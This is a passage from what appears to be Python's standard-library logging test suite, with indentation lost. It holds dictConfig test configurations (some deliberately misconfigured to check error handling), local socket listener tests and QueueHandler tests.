with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
# See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
# confirm our assumption: no loggers are set
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
class myCustomFormatter:
def __init__(self, fmt, datefmt=None):
pass
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config 7 does not define compiler.parser but defines compiler.lexer
# so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
# As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config0, but with properties
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
# Configuration with custom logging.Formatter subclass as '()' key and 'validate' set to False
custom_formatter_class_validate = {
'version': 1,
'formatters': {
'form1': {
'()': __name__ + '.ExceptionFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom logging.Formatter subclass as 'class' key and 'validate' set to False
custom_formatter_class_validate2 = {
'version': 1,
'formatters': {
'form1': {
'class': __name__ + '.ExceptionFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom class that is not inherited from logging.Formatter
custom_formatter_class_validate3 = {
'version': 1,
'formatters': {
'form1': {
'class': __name__ + '.myCustomFormatter',
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
# Configuration with custom function and 'validate' set to False
custom_formatter_with_function = {
'version': 1,
'formatters': {
'form1': {
'()': formatFunc,
'format': '%(levelname)s:%(name)s:%(message)s',
'validate': False,
},
},
'handlers' : {
'hand1' : {
'class': 'logging.StreamHandler',
'formatter': 'form1',
'level': 'NOTSET',
'stream': 'ext://sys.stdout',
},
},
"loggers": {
"my_test_logger_custom_formatter": {
"level": "DEBUG",
"handlers": ["hand1"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
# Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
# Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
# Nothing will be output since handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
# Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
def test_config14_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config14)
h = logging._handlers['hand1']
self.assertEqual(h.foo, 'bar')
self.assertEqual(h.terminator, '!\n')
logging.warning('Exclamation')
self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
def test_config15_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
config = {
"version": 1,
"handlers": {
"file": {
"class": "logging.FileHandler",
"filename": fn
}
},
"root": {
"handlers": ["file"]
}
}
self.apply_config(config)
self.apply_config(config)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def setup_via_listener(self, text, verify=None):
text = text.encode("utf-8")
# Ask for a randomly assigned port (by using port 0)
t = logging.config.listen(0, verify)
t.start()
t.ready.wait()
# Now get the port allocated
port = t.port
t.ready.clear()
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2.0)
sock.connect(('localhost', port))
slen = struct.pack('>L', len(text))
s = slen + text
sentsofar = 0
left = len(s)
while left > 0:
sent = sock.send(s[sentsofar:])
sentsofar += sent
left -= sent
sock.close()
finally:
t.ready.wait(2.0)
logging.config.stopListening()
support.join_thread(t, 2.0)
def test_listen_config_10_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(json.dumps(self.config10))
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_listen_config_1_ok(self):
with support.captured_stdout() as output:
self.setup_via_listener(textwrap.dedent(ConfigFileTest.config1))
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_listen_verify(self):
def verify_fail(stuff):
return None
def verify_reverse(stuff):
return stuff[::-1]
logger = logging.getLogger("compiler.parser")
to_send = textwrap.dedent(ConfigFileTest.config1)
# First, specify a verification function that will fail.
# We expect to see no output, since our configuration
# never took effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send, verify_fail)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([], stream=output)
# Original logger output has the stuff we logged.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform no verification. Our configuration
# should take effect.
with support.captured_stdout() as output:
self.setup_via_listener(to_send) # no verify callable specified
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
# Now, perform verification which transforms the bytes.
with support.captured_stdout() as output:
self.setup_via_listener(to_send[::-1], verify_reverse)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output still has the stuff we logged before.
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], pat=r"^[\w.]+ -> (\w+): (\d+)$")
def test_out_of_order(self):
self.assertRaises(ValueError, self.apply_config, self.out_of_order)
def test_out_of_order_with_dollar_style(self):
config = copy.deepcopy(self.out_of_order)
config['formatters']['mySimpleFormatter']['format'] = "${asctime} (${name}) ${levelname}: ${message}"
self.apply_config(config)
handler = logging.getLogger('mymodule').handlers[0]
self.assertIsInstance(handler.target, logging.Handler)
self.assertIsInstance(handler.formatter._style,
logging.StringTemplateStyle)
def test_custom_formatter_class_with_validate(self):
self.apply_config(self.custom_formatter_class_validate)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate2(self):
self.apply_config(self.custom_formatter_class_validate2)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate2_with_wrong_fmt(self):
config = self.custom_formatter_class_validate.copy()
config['formatters']['form1']['style'] = "$"
# Exception should not be raise as we have configured 'validate' to False
self.apply_config(config)
handler = logging.getLogger("my_test_logger_custom_formatter").handlers[0]
self.assertIsInstance(handler.formatter, ExceptionFormatter)
def test_custom_formatter_class_with_validate3(self):
self.assertRaises(ValueError, self.apply_config, self.custom_formatter_class_validate3)
def test_custom_formatter_function_with_validate(self):
self.assertRaises(ValueError, self.apply_config, self.custom_formatter_with_function)
def test_baseconfig(self):
d = {
'atuple': (1, 2, 3),
'alist': ['a', 'b', 'c'],
'adict': {'d': 'e', 'f': 3 },
'nest1': ('g', ('h', 'i'), 'j'),
'nest2': ['k', ['l', 'm'], 'n'],
'nest3': ['o', 'cfg://alist', 'p'],
}
bc = logging.config.BaseConfigurator(d)
self.assertEqual(bc.convert('cfg://atuple[1]'), 2)
self.assertEqual(bc.convert('cfg://alist[1]'), 'b')
self.assertEqual(bc.convert('cfg://nest1[1][0]'), 'h')
self.assertEqual(bc.convert('cfg://nest2[1][1]'), 'm')
self.assertEqual(bc.convert('cfg://adict.d'), 'e')
self.assertEqual(bc.convert('cfg://adict[f]'), 3)
v = bc.convert('cfg://nest3')
self.assertEqual(v.pop(1), ['a', 'b', 'c'])
self.assertRaises(KeyError, bc.convert, 'cfg://nosuch')
self.assertRaises(ValueError, bc.convert, 'cfg://!')
self.assertRaises(KeyError, bc.convert, 'cfg://adict[2]')
class ManagerTest(BaseTest):
def test_manager_loggerclass(self):
logged = []
class MyLogger(logging.Logger):
def _log(self, level, msg, args, exc_info=None, extra=None):
logged.append(msg)
man = logging.Manager(None)
self.assertRaises(TypeError, man.setLoggerClass, int)
man.setLoggerClass(MyLogger)
logger = man.getLogger('test')
logger.warning('should appear in logged')
logging.warning('should not appear in logged')
self.assertEqual(logged, ['should appear in logged'])
def test_set_log_record_factory(self):
man = logging.Manager(None)
expected = object()
man.setLogRecordFactory(expected)
self.assertEqual(man.logRecordFactory, expected)
class ChildLoggerTest(BaseTest):
def test_child_loggers(self):
r = logging.getLogger()
l1 = logging.getLogger('abc')
l2 = logging.getLogger('def.ghi')
c1 = r.getChild('xyz')
c2 = r.getChild('uvw.xyz')
self.assertIs(c1, logging.getLogger('xyz'))
self.assertIs(c2, logging.getLogger('uvw.xyz'))
c1 = l1.getChild('def')
c2 = c1.getChild('ghi')
c3 = l1.getChild('def.ghi')
self.assertIs(c1, logging.getLogger('abc.def'))
self.assertIs(c2, logging.getLogger('abc.def.ghi'))
self.assertIs(c2, c3)
class DerivedLogRecord(logging.LogRecord):
pass
class LogRecordFactoryTest(BaseTest):
def setUp(self):
class CheckingFilter(logging.Filter):
def __init__(self, cls):
self.cls = cls
def filter(self, record):
t = type(record)
if t is not self.cls:
msg = 'Unexpected LogRecord type %s, expected %s' % (t,
self.cls)
raise TypeError(msg)
return True
BaseTest.setUp(self)
self.filter = CheckingFilter(DerivedLogRecord)
self.root_logger.addFilter(self.filter)
self.orig_factory = logging.getLogRecordFactory()
def tearDown(self):
self.root_logger.removeFilter(self.filter)
BaseTest.tearDown(self)
logging.setLogRecordFactory(self.orig_factory)
def test_logrecord_class(self):
self.assertRaises(TypeError, self.root_logger.warning,
self.next_message())
logging.setLogRecordFactory(DerivedLogRecord)
self.root_logger.error(self.next_message())
self.assert_log_lines([
('root', 'ERROR', '2'),
])
class QueueHandlerTest(BaseTest):
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.queue = queue.Queue(-1)
self.que_hdlr = logging.handlers.QueueHandler(self.queue)
self.name = 'que'
self.que_logger = logging.getLogger('que')
self.que_logger.propagate = False
self.que_logger.setLevel(logging.WARNING)
self.que_logger.addHandler(self.que_hdlr)
def tearDown(self):
self.que_hdlr.close()
BaseTest.tearDown(self)
def test_queue_handler(self):
self.que_logger.debug(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
self.que_logger.info(self.next_message())
self.assertRaises(queue.Empty, self.queue.get_nowait)
msg = self.next_message()
self.que_logger.warning(msg)
data = self.queue.get_nowait()
self.assertTrue(isinstance(data, logging.LogRecord))
self.assertEqual(data.name, self.que_logger.name)
self.assertEqual((data.msg, data.args), (msg, None))
def test_formatting(self):
msg = self.next_message()
levelname = logging.getLevelName(logging.WARNING)
log_format_str = '{name} -> {levelname}: {message}'
formatted_msg = log_format_str.format(name=self.name,
levelname=levelname, message=msg)
formatter = logging.Formatter(self.log_format)
self.que_hdlr.setFormatter(formatter)
self.que_logger.warning(msg)
log_record = self.queue.get_nowait()
self.assertEqual(formatted_msg, log_record.msg)
self.assertEqual(formatted_msg, log_record.message)
@unittest.skipUnless(hasattr(logging.handlers, 'QueueListener'),
'logging.handlers.QueueListener required for this test')
def test_queue_listener(self):
handler = support.TestHandler(support.Matcher())
listener = logging.handlers.QueueListener(self.queue, handler)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertTrue(handler.matches(levelno=logging.WARNING, message='1'))
self.assertTrue(handler.matches(levelno=logging.ERROR, message='2'))
self.assertTrue(handler.matches(levelno=logging.CRITICAL, message='3'))
handler.close()
# Now test with respect_handler_level set
handler = support.TestHandler(support.Matcher())
handler.setLevel(logging.CRITICAL)
listener = logging.handlers.QueueListener(self.queue, handler,
respect_handler_level=True)
listener.start()
try:
self.que_logger.warning(self.next_message())
self.que_logger.error(self.next_message())
self.que_logger.critical(self.next_message())
finally:
listener.stop()
self.assertFalse(handler.matches(levelno=logging.WARNING, message='4'))
